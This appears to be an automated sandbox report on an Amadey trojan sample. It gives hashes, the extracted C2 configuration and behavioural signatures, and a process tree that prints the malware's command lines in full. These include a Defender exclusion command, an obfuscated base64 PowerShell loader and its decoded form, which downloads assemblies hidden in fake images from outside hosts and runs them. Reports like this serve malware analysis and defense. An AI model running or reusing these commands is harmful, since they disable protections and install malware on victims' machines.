Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 13:10

General

  • Target

    random.exe

  • Size

    2.0MB

  • MD5

    453e433ce707a2dff379af17e1a7fe44

  • SHA1

    c95d4c253627be7f36630f5e933212818de19ed7

  • SHA256

    ab8b903ee062c93347eb738d00d0dbf707cdbbb8d26cf4dac7691ccbf8a8aff2

  • SHA512

    9aa5b06bf01017aa13fd57350ba627cc892246e55e5adf8d785ff8a2252da7cbc28cf5e5e4170d877e4be01538a230646cfc581873acf183f0485c66e6397fd4

  • SSDEEP

    49152:r3NOfcJRt0nsMQ8Yry0GO0WqMQvELO6fKM3O:TNt0nsR8Ud7p1O

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 4 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Sets service image path in registry 2 TTPs 7 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 12 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 25 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\random.exe
    "C:\Users\Admin\AppData\Local\Temp\random.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4164
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4752
      • C:\Users\Admin\AppData\Local\Temp\10299570101\laf6w_001.exe
        "C:\Users\Admin\AppData\Local\Temp\10299570101\laf6w_001.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:5812
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1968
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe Add-MpPreference -ExclusionPath 'C:'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2540
        • C:\Windows\system32\svchost.exe
          "C:\Windows\system32\svchost.exe"
          4⤵
          • Downloads MZ/PE file
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:1504
          • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe
            "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe" ""
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            • Suspicious behavior: LoadsDriver
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3532
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Remove-MpPreference -ExclusionPath C:\
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1272
          • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
            "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
            5⤵
            • Deletes itself
            • Executes dropped EXE
            PID:1996
            • C:\Users\Admin\AppData\Local\Temp\{d690cdd4-fe56-4b62-8948-54d5eb0f651c}\73aa15d8.exe
              "C:\Users\Admin\AppData\Local\Temp\{d690cdd4-fe56-4b62-8948-54d5eb0f651c}\73aa15d8.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
              6⤵
              • Executes dropped EXE
              • Checks for VirtualBox DLLs, possible anti-VM trick
              • System Location Discovery: System Language Discovery
              PID:10884
              • C:\Users\Admin\AppData\Local\Temp\{737dd80c-8f6e-4116-9469-cff6afca99e7}\4dcb6d7b.exe
                C:/Users/Admin/AppData/Local/Temp/{737dd80c-8f6e-4116-9469-cff6afca99e7}/\4dcb6d7b.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                7⤵
                • Drops file in Drivers directory
                • Sets service image path in registry
                • Executes dropped EXE
                • Impair Defenses: Safe Mode Boot
                • Loads dropped DLL
                • Adds Run key to start application
                • Checks for any installed AV software in registry
                • Enumerates connected drives
                • Writes to the Master Boot Record (MBR)
                • Checks for VirtualBox DLLs, possible anti-VM trick
                • Event Triggered Execution: Netsh Helper DLL
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: LoadsDriver
                PID:11704
      • C:\Users\Admin\AppData\Local\Temp\10299580101\4c7c16f8a2.exe
        "C:\Users\Admin\AppData\Local\Temp\10299580101\4c7c16f8a2.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1844
      • C:\Users\Admin\AppData\Local\Temp\10299590101\eBOjg2u.exe
        "C:\Users\Admin\AppData\Local\Temp\10299590101\eBOjg2u.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:6396
        • C:\Windows\SYSTEM32\cmd.exe
          cmd.exe /c 1.bat && 2.js
          4⤵
          • Checks computer location settings
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:6452
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic cpu get name
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:6516
          • C:\Windows\system32\find.exe
            find "QEMU"
            5⤵
              PID:6524
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:6596
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of SetThreadContext
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:6808
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:8744
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2.js"
              5⤵
                PID:9020
          • C:\Users\Admin\AppData\Local\Temp\10299600101\eBOjg2u.exe
            "C:\Users\Admin\AppData\Local\Temp\10299600101\eBOjg2u.exe"
            3⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:7216
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c 1.bat && 2.js
              4⤵
              • Checks computer location settings
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:4664
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic cpu get name
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:7412
              • C:\Windows\system32\find.exe
                find "QEMU"
                5⤵
                  PID:7428
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@k@EI@eQB0@GU@cw@g@D0@I@@n@Gg@d@B0@Cc@Ow@N@@o@J@BC@Hk@d@Bl@HM@Mg@g@D0@I@@n@H@@cw@6@C8@Lw@n@Ds@DQ@K@CQ@b@Bm@HM@Z@Bm@HM@Z@Bn@C@@PQ@g@C@@J@BC@Hk@d@Bl@HM@I@@r@CQ@QgB5@HQ@ZQBz@DI@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bs@Gk@bgBr@HM@I@@9@C@@Q@@o@Cg@J@Bs@GY@cwBk@GY@cwBk@Gc@I@@r@C@@JwBi@Gk@d@Bi@HU@YwBr@GU@d@@u@G8@cgBn@C8@ZwBm@Gg@Z@Bq@Gs@Z@Bk@C8@agBo@Gg@a@Bo@Gg@a@Bo@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@KQ@s@C@@K@@k@Gw@ZgBz@GQ@ZgBz@GQ@Zw@g@Cs@I@@n@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@